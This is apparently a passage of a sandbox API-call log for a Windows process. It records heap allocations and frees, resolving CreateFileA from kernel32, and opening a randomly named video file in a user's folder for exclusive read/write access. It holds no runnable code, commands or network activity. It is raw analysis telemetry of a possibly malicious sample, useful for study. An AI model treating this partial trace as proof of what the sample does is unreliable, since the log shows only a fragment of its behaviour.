RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0196.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0196.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0196.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0196.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0196.801] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0196.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0196.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0196.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0196.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0196.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0196.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0196.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0196.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0196.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0196.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0196.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0196.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0196.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0196.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0196.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0196.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0196.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0196.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0196.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0196.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0196.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0196.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0196.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0196.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0196.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0196.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0196.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0196.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0196.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0196.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0196.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0196.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0196.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0196.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0196.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0196.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0196.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0196.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0196.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0196.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0196.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0196.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0196.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0196.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0196.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0196.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0196.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0196.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0196.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0196.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0196.804] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0196.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0196.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0196.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0196.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bdab0 [0196.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bdab0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0196.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0196.805] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0196.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0196.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0196.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0196.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0196.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0196.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0196.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0196.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bdab0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0196.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0196.805] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0196.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0196.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0196.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0196.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0196.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0196.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0196.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0196.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0196.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0196.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0196.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0196.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv", cchWideChar=86, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 86 [0196.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x56) returned 0x8c4a48 [0196.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv", cchWideChar=86, lpMultiByteStr=0x8c4a48, cbMultiByte=86, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv", lpUsedDefaultChar=0x0) returned 86 [0196.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0196.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0196.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0196.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0196.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0196.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0196.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0196.806] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\_4x_cnshky.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0196.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0196.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0196.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0196.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0196.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0196.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0196.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0196.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0196.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0196.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0196.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0196.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0196.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0196.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=86, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0196.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xac) returned 0x8e6e48 [0196.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=86, lpWideCharStr=0x8e6e48, cchWideChar=86 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv") returned 86 [0196.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0196.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0196.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0196.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0196.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0196.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0196.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0196.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0196.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0196.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0196.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0196.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0196.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0196.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0196.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0196.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0196.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0196.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0196.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0196.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0196.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0196.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0196.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0196.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0196.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0196.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0196.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0196.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0196.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0196.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0196.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0196.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0196.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0196.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0196.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0196.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0196.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0196.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0196.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0196.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0196.809] FreeLibrary (hLibModule=0x75990000) returned 1 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0196.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0196.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: 